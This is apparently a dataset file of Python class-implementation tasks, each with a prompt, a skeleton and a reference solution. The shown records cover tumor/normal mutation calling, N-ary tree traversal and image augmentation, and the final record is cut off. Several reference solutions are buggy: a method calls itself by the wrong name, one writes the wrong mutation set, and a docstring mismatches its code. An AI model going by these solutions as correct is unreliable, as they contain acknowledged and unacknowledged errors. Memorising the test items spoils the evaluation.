{"blob_id": "823ff152610a1f07d0dbd0253c7125d1a92e4077", "bodies": ["self.data = {}\ncancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\nnormal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\ncancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\nnormal_consensus_qualities = get_consensus_qualities(normal_ann_file)\nconsensus_qualities = {}\nconsensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\nconsensus_qualities[sample_name + 'N'] = normal_consensus_qualities\nfor exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)", "inherited = defaultdict(dict)\nsomatic = defaultdict(dict)\nfor exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\nreturn (inherited, somatic)", "inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\nif somatic_or_inherited == 'somatic':\n use_muts = somatic\nelse:\n use_muts = inherited\nwith open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')", "inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\nwrite_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\nwrite_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')"], "bodies_text": "<|body_start_0|>\n self.data = {}\n cancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\n normal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\n cancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\n normal_consensus_qualities = get_consensus_qualities(normal_ann_file)\n consensus_qualities = {}\n consensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\n consensus_qualities[sample_name + 'N'] = normal_consensus_qualities\n for exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)\n<|end_body_0|>\n\n<|body_start_1|>\n inherited = defaultdict(dict)\n somatic = defaultdict(dict)\n for exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n return (inherited, somatic)\n<|end_body_1|>\n\n<|body_start_2|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n if somatic_or_inherited == 'somatic':\n use_muts = somatic\n else:\n use_muts = inherited\n with open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')\n<|end_body_2|>\n\n<|body_start_3|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n write_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\n write_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')\n<|end_body_3|>\n", "class_docstring": "Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples", "class_name": "calls", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass calls:\n \"\"\"Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\"\"\"\n\n def __init__(self, data_dir, sample_name):\n \"\"\"Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\"\"\"\n <|body_0|>\n\n def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff):\n \"\"\"Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\"\"\"\n <|body_1|>\n\n def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile):\n \"\"\"Write mutations for file\"\"\"\n <|body_2|>\n\n def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file):\n \"\"\"Write input for MU2A for inherited and somatic mutations. This is broken b/c of the function above\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.data = {}\n cancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\n normal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\n cancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\n normal_consensus_qualities = get_consensus_qualities(normal_ann_file)\n consensus_qualities = {}\n consensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\n consensus_qualities[sample_name + 'N'] = normal_consensus_qualities\n for exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)\n<|end_body_0|>\n\n<|body_start_1|>\n inherited = defaultdict(dict)\n somatic = defaultdict(dict)\n for exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n return (inherited, somatic)\n<|end_body_1|>\n\n<|body_start_2|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n if somatic_or_inherited == 'somatic':\n use_muts = somatic\n else:\n use_muts = inherited\n with open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')\n<|end_body_2|>\n\n<|body_start_3|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n write_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\n write_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000458", "length_bytes": 12376, "license_type": "no_license", "methods": [{"docstring": "Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data", "name": "__init__", "signature": "def __init__(self, data_dir, sample_name)"}, {"docstring": "Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}", "name": "get_inherited_somatic_mutations", "signature": "def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff)"}, {"docstring": "Write mutations for file", "name": "write_mutations", "signature": "def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile)"}, {"docstring": "Write input for MU2A for inherited and somatic mutations. This is broken b/c of the function above", "name": "mk_MU2A_input", "signature": "def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_001118", "prompt": "Implement the Python class `calls` described below.\n\nClass description:\nSimple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\n\nMethod signatures and docstrings:\n- def __init__(self, data_dir, sample_name): Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\n- def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff): Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\n- def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile): Write mutations for file\n- def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file): Write input for MU2A for inherited and somatic mutations. This is broken b/c of the function above", "prompted_full_text": "Implement the Python class `calls` described below.\n\nClass description:\nSimple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\n\nMethod signatures and docstrings:\n- def __init__(self, data_dir, sample_name): Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\n- def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff): Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\n- def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile): Write mutations for file\n- def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file): Write input for MU2A for inherited and somatic mutations. This is broken b/c of the function above\n\n<|skeleton|>\nclass calls:\n \"\"\"Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\"\"\"\n\n def __init__(self, data_dir, sample_name):\n \"\"\"Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\"\"\"\n <|body_0|>\n\n def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff):\n \"\"\"Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\"\"\"\n <|body_1|>\n\n def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile):\n \"\"\"Write mutations for file\"\"\"\n <|body_2|>\n\n def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file):\n \"\"\"Write input for MU2A for inherited and somatic mutations. This is broken b/c of the function above\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.data = {}\n cancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\n normal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\n cancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\n normal_consensus_qualities = get_consensus_qualities(normal_ann_file)\n consensus_qualities = {}\n consensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\n consensus_qualities[sample_name + 'N'] = normal_consensus_qualities\n for exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)\n<|end_body_0|>\n\n<|body_start_1|>\n inherited = defaultdict(dict)\n somatic = defaultdict(dict)\n for exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n return (inherited, somatic)\n<|end_body_1|>\n\n<|body_start_2|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n if somatic_or_inherited == 'somatic':\n use_muts = somatic\n else:\n use_muts = inherited\n with open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')\n<|end_body_2|>\n\n<|body_start_3|>\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n write_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\n write_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')\n<|end_body_3|>\n", "revision_id": "6565975357bb944f7a4b3d1b2e502ca3cf9d2312", "skeleton": "<|skeleton|>\nclass calls:\n \"\"\"Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\"\"\"\n\n def __init__(self, data_dir, sample_name):\n \"\"\"Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\"\"\"\n <|body_0|>\n\n def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff):\n \"\"\"Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\"\"\"\n <|body_1|>\n\n def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile):\n \"\"\"Write mutations for file\"\"\"\n <|body_2|>\n\n def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file):\n \"\"\"Write input for MU2A for inherited and somatic mutations. This is broken b/c of the function above\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class calls:\n \"\"\"Simple class for data parsed from data/all_non_ref_hg19/yuaker folder, or other samples\"\"\"\n\n def __init__(self, data_dir, sample_name):\n \"\"\"Parses exome and ann files in data_dir for this sample to make {} of paired tumor/normal call data\"\"\"\n self.data = {}\n cancer_ann_file = os.path.join(data_dir, sample_name + 'T.ann')\n normal_ann_file = os.path.join(data_dir, sample_name + 'N.ann')\n cancer_consensus_qualities = get_consensus_qualities(cancer_ann_file)\n normal_consensus_qualities = get_consensus_qualities(normal_ann_file)\n consensus_qualities = {}\n consensus_qualities[sample_name + 'T'] = cancer_consensus_qualities\n consensus_qualities[sample_name + 'N'] = normal_consensus_qualities\n for exome_type in global_settings.exome_types:\n call_file = os.path.join(data_dir, exome_type)\n self.data[exome_type] = parse_call_file(call_file, consensus_qualities)\n\n def get_inherited_somatic_mutations(self, quality_cutoff, coverage_cutoff):\n \"\"\"Return chrpos and ref, normal, cancer alleles for in inherited and somatic {}\"\"\"\n inherited = defaultdict(dict)\n somatic = defaultdict(dict)\n for exome_type in self.data:\n for chrpos in self.data[exome_type]:\n if self.data[exome_type][chrpos]['N']['consensus_quality'] > quality_cutoff and self.data[exome_type][chrpos]['T']['consensus_quality'] > quality_cutoff and (self.data[exome_type][chrpos]['N']['coverage'] >= coverage_cutoff) and (self.data[exome_type][chrpos]['T']['coverage'] >= coverage_cutoff) and (max((self.data[exome_type][chrpos]['N']['snp_quality'], self.data[exome_type][chrpos]['T']['snp_quality'])) > quality_cutoff):\n mutation_type = self.data[exome_type][chrpos]['mutation_type']\n m1, m2 = mutation_type.split(':')\n if mutation_type in ('BB:BB', 'AB:AB'):\n inherited[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n elif mutation_type not in ('AB:AA', 'AB:BB') and m1 != m2:\n somatic[exome_type][chrpos] = (mutation_type, self.data[exome_type][chrpos]['N']['call'], self.data[exome_type][chrpos]['T']['call'], self.data[exome_type][chrpos]['ref_allele'])\n return (inherited, somatic)\n\n def write_mutations(self, quality_cutoff, coverage_cutoff, exome_type, somatic_or_inherited, afile):\n \"\"\"Write mutations for file\"\"\"\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n if somatic_or_inherited == 'somatic':\n use_muts = somatic\n else:\n use_muts = inherited\n with open(afile, 'w') as f:\n for chrpos in inherited[exome_type]:\n f.write(chrpos + '\\n')\n\n def mk_MU2A_input(exome_type, quality_cutoff, coverage_cutoff, inherited_output_file, somatic_output_file):\n \"\"\"Write input for MU2A for inherited and somatic mutations. This is broken b/c of the function above\"\"\"\n inherited, somatic = self.get_somatic_inherited_mutations(quality_cutoff, coverage_cutoff)\n write_MU2A_input(inherited[exome_type], inherited_output_file, 'inherited')\n write_MU2A_input(somatic[exome_type], somatic_output_file, 'somatic')\n", "source": "the_stack_v2_python_sparse", "source_path": "call_class.py", "source_repo": "samesense/loh", "split": "test", "star_events_count": 0} {"blob_id": "8c92b85d7fd65836ccfebdc63523d73953e6148f", "bodies": ["if not root:\n return []\nres = []\n\ndef digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\ndigui(root)\nreturn res", "if not root:\n return []\nres = []\nstack = [root]\nwhile stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n res.append(node.val)\nreturn res[::-1]"], "bodies_text": "<|body_start_0|>\n if not root:\n return []\n res = []\n\n def digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\n digui(root)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n res = []\n stack = [root]\n while stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n res.append(node.val)\n return res[::-1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def postorder(self, root: 'Node') -> List[int]:\n \"\"\"递归\"\"\"\n <|body_0|>\n\n def postorder1(self, root: 'Node') -> List[int]:\n \"\"\"迭代\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return []\n res = []\n\n def digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\n digui(root)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n res = []\n stack = [root]\n while stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n res.append(node.val)\n return res[::-1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000459", "length_bytes": 1058, "license_type": "no_license", "methods": [{"docstring": "递归", "name": "postorder", "signature": "def postorder(self, root: 'Node') -> List[int]"}, {"docstring": "迭代", "name": "postorder1", "signature": "def postorder1(self, root: 'Node') -> List[int]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007205", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def postorder(self, root: 'Node') -> List[int]: 递归\n- def postorder1(self, root: 'Node') -> List[int]: 迭代", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def postorder(self, root: 'Node') -> List[int]: 递归\n- def postorder1(self, root: 'Node') -> List[int]: 迭代\n\n<|skeleton|>\nclass Solution:\n\n def postorder(self, root: 'Node') -> List[int]:\n \"\"\"递归\"\"\"\n <|body_0|>\n\n def postorder1(self, root: 'Node') -> List[int]:\n \"\"\"迭代\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return []\n res = []\n\n def digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\n digui(root)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n res = []\n stack = [root]\n while stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n res.append(node.val)\n return res[::-1]\n<|end_body_1|>\n", "revision_id": "069bb0b751ef7f469036b9897436eb5d138ffa24", "skeleton": "<|skeleton|>\nclass Solution:\n\n def postorder(self, root: 'Node') -> List[int]:\n \"\"\"递归\"\"\"\n <|body_0|>\n\n def postorder1(self, root: 'Node') -> List[int]:\n \"\"\"迭代\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def postorder(self, root: 'Node') -> List[int]:\n \"\"\"递归\"\"\"\n if not root:\n return []\n res = []\n\n def digui(root):\n if root:\n for i in root.children:\n digui(i)\n res.append(root.val)\n digui(root)\n return res\n\n def postorder1(self, root: 'Node') -> List[int]:\n \"\"\"迭代\"\"\"\n if not root:\n return []\n res = []\n stack = [root]\n while stack:\n node = stack.pop()\n for i in node.children:\n stack.append(i)\n res.append(node.val)\n return res[::-1]\n", "source": "the_stack_v2_python_sparse", "source_path": "算法/Week_02/590. N叉树的后序遍历.py", "source_repo": "RichieSong/algorithm", "split": "test", "star_events_count": 0} {"blob_id": "e1426244087fa354b7844654903b2583fd590fb6", "bodies": ["self.num = num\nself.magnitude = magnitude\nself.prob = prob\nself.magnitude_std = magnitude_std", "transforms = []\nif self.prob < 1.0 and random.random() > self.prob:\n return img\nfor name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\nops = np.random.choice(transforms, self.num)\nfor op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\nreturn img"], "bodies_text": "<|body_start_0|>\n self.num = num\n self.magnitude = magnitude\n self.prob = prob\n self.magnitude_std = magnitude_std\n<|end_body_0|>\n\n<|body_start_1|>\n transforms = []\n if self.prob < 1.0 and random.random() > self.prob:\n return img\n for name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\n ops = np.random.choice(transforms, self.num)\n for op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\n return img\n<|end_body_1|>\n", "class_docstring": "Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int", "class_name": "AutoAugment", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0", "BSD-3-Clause", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AutoAugment:\n \"\"\"Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\"\"\"\n\n def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5):\n \"\"\"Construct the AutoContrast class.\"\"\"\n <|body_0|>\n\n def __call__(self, img):\n \"\"\"Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.num = num\n self.magnitude = magnitude\n self.prob = prob\n self.magnitude_std = magnitude_std\n<|end_body_0|>\n\n<|body_start_1|>\n transforms = []\n if self.prob < 1.0 and random.random() > self.prob:\n return img\n for name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\n ops = np.random.choice(transforms, self.num)\n for op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\n return img\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000460", "length_bytes": 2814, "license_type": "permissive", "methods": [{"docstring": "Construct the AutoContrast class.", "name": "__init__", "signature": "def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5)"}, {"docstring": "Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor", "name": "__call__", "signature": "def __call__(self, img)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002473", "prompt": "Implement the Python class `AutoAugment` described below.\n\nClass description:\nApplies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\n\nMethod signatures and docstrings:\n- def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5): Construct the AutoContrast class.\n- def __call__(self, img): Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor", "prompted_full_text": "Implement the Python class `AutoAugment` described below.\n\nClass description:\nApplies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\n\nMethod signatures and docstrings:\n- def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5): Construct the AutoContrast class.\n- def __call__(self, img): Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\n\n<|skeleton|>\nclass AutoAugment:\n \"\"\"Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\"\"\"\n\n def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5):\n \"\"\"Construct the AutoContrast class.\"\"\"\n <|body_0|>\n\n def __call__(self, img):\n \"\"\"Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.num = num\n self.magnitude = magnitude\n self.prob = prob\n self.magnitude_std = magnitude_std\n<|end_body_0|>\n\n<|body_start_1|>\n transforms = []\n if self.prob < 1.0 and random.random() > self.prob:\n return img\n for name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\n ops = np.random.choice(transforms, self.num)\n for op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\n return img\n<|end_body_1|>\n", "revision_id": "12e37a1991eb6771a2999fe0a46ddda920c47948", "skeleton": "<|skeleton|>\nclass AutoAugment:\n \"\"\"Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\"\"\"\n\n def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5):\n \"\"\"Construct the AutoContrast class.\"\"\"\n <|body_0|>\n\n def __call__(self, img):\n \"\"\"Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AutoAugment:\n \"\"\"Applies AutoContrast to 'img'. The AutoContrast operation maximizes the the image contrast, by making the darkest pixel black and lightest pixel white. :param level: Strength of the operation specified as an Integer from [0, 'PARAMETER_MAX']. :type level: int\"\"\"\n\n def __init__(self, num=2, magnitude=9, prob=0.5, magnitude_std=0.5):\n \"\"\"Construct the AutoContrast class.\"\"\"\n self.num = num\n self.magnitude = magnitude\n self.prob = prob\n self.magnitude_std = magnitude_std\n\n def __call__(self, img):\n \"\"\"Call function of AutoContrast. :param img: input image :type img: numpy or tensor :return: the image after transform :rtype: numpy or tensor\"\"\"\n transforms = []\n if self.prob < 1.0 and random.random() > self.prob:\n return img\n for name in self._RAND_TRANSFORMS.keys():\n if ClassFactory.is_exists(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]):\n transforms.append(ClassFactory.get_cls(ClassType.TRANSFORM, self._RAND_TRANSFORMS[name]))\n ops = np.random.choice(transforms, self.num)\n for op in ops:\n if self.magnitude_std and self.magnitude_std > 0:\n magnitude = random.gauss(self.magnitude, self.magnitude_std)\n magnitude = min(10, max(0, magnitude))\n img = op(magnitude)(img)\n return img\n", "source": "the_stack_v2_python_sparse", 